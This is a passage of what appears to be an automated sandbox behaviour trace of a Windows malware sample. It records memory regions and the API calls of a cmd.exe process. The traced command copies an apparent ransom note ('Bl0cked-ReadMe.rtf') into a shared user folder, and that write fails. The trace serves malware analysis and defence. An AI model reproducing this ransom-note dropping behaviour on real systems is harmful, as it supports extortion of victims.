region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24577 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24578 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24579 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 24580 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24581 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 432 os_tid = 0xb38 Process: id = "320" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24582 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24583 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24584 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24585 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24586 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24587 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24588 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24589 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24590 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24591 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24594 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24595 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 24596 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 24597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 
0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24606 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24609 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 24610 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 24611 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24612 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 24613 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 24614 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 24615 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 24626 start_va = 0x550000 end_va = 0x60ffff entry_point = 0x550000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 433 os_tid = 0xac4 [0177.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcf4 | out: lpSystemTimeAsFileTime=0x2afcf4*(dwLowDateTime=0x9f8986e0, dwHighDateTime=0x1d440a9)) [0177.530] GetCurrentProcessId () returned 0xcc0 [0177.530] GetCurrentThreadId () returned 0xac4 [0177.530] GetTickCount () returned 0x336c8 [0177.530] 
QueryPerformanceCounter (in: lpPerformanceCount=0x2afcec | out: lpPerformanceCount=0x2afcec*=23431951663) returned 1 [0177.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0177.531] __set_app_type (_Type=0x1) [0177.531] __p__fmode () returned 0x76b331f4 [0177.531] __p__commode () returned 0x76b331fc [0177.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0177.531] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0177.531] GetCurrentThreadId () returned 0xac4 [0177.531] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac4) returned 0x38 [0177.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.531] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0177.531] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0177.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc84 | out: phkResult=0x2afc84*=0x0) returned 0x2 [0177.532] VirtualQuery (in: lpAddress=0x2afcbb, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, 
AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] GetConsoleOutputCP () returned 0x1b5 [0177.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.532] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.533] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0177.533] GetEnvironmentStringsW () returned 0x3501a8* [0177.533] FreeEnvironmentStringsW (penv=0x3501a8) returned 1 [0177.533] GetEnvironmentStringsW () returned 0x3501a8* [0177.533] FreeEnvironmentStringsW (penv=0x3501a8) returned 1 [0177.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0177.533] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0xd0, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegCloseKey (hKey=0x40) returned 0x0 [0177.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegCloseKey (hKey=0x40) returned 0x0 [0177.534] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0177.534] srand (_Seed=0x5b88638d) [0177.534] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" [0177.534] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" [0177.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.534] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0177.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.535] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0177.535] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0177.535] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0177.535] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0177.535] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0177.535] GetEnvironmentStringsW () returned 0x3522f8* [0177.535] FreeEnvironmentStringsW (penv=0x3522f8) returned 1 [0177.535] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0177.535] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.535] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0177.535] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0177.535] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0177.535] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0177.535] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0177.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c0, lpFilePart=0x2af9bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9bc*="Desktop") returned 0x18 [0177.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.536] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0177.536] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0177.536] GetEnvironmentStringsW () returned 0x352b18* [0177.537] FreeEnvironmentStringsW (penv=0x352b18) returned 1 [0177.537] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.537] GetConsoleOutputCP () returned 0x1b5 [0177.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.537] GetUserDefaultLCID () returned 0x409 [0177.537] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0177.537] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb00, cchData=128 | out: lpLCData="1") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0177.538] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0177.539] GetConsoleTitleW (in: lpConsoleTitle=0x3408f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0177.540] _wcsicmp (_String1="type", _String2=")") returned 75 [0177.540] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0177.540] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0177.540] _wcsicmp (_String1="IF", _String2="type") returned -11 [0177.540] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0177.540] _wcsicmp (_String1="REM", _String2="type") returned -2 [0177.540] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] GetFileType (hFile=0x7) returned 0x2 [0177.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.544] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af9f8 | out: lpMode=0x2af9f8) returned 1 [0177.544] _dup (_FileHandle=1) returned 3 [0177.544] _close (_FileHandle=1) returned 0 [0177.544] _wcsicmp 
(_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0177.544] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af9c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.688] GetLastError () returned 0x20 [0177.688] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0177.688] _close (_FileHandle=3) returned 0 [0177.688] _get_osfhandle (_FileHandle=2) returned 0xb [0177.688] GetFileType (hFile=0xb) returned 0x2 [0177.688] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0177.688] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2af974 | out: lpMode=0x2af974) returned 1 [0177.689] _get_osfhandle (_FileHandle=2) returned 0xb [0177.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af9a8 | out: lpConsoleScreenBufferInfo=0x2af9a8) returned 1 [0177.689] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0177.690] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2af9e8 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0177.690] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, 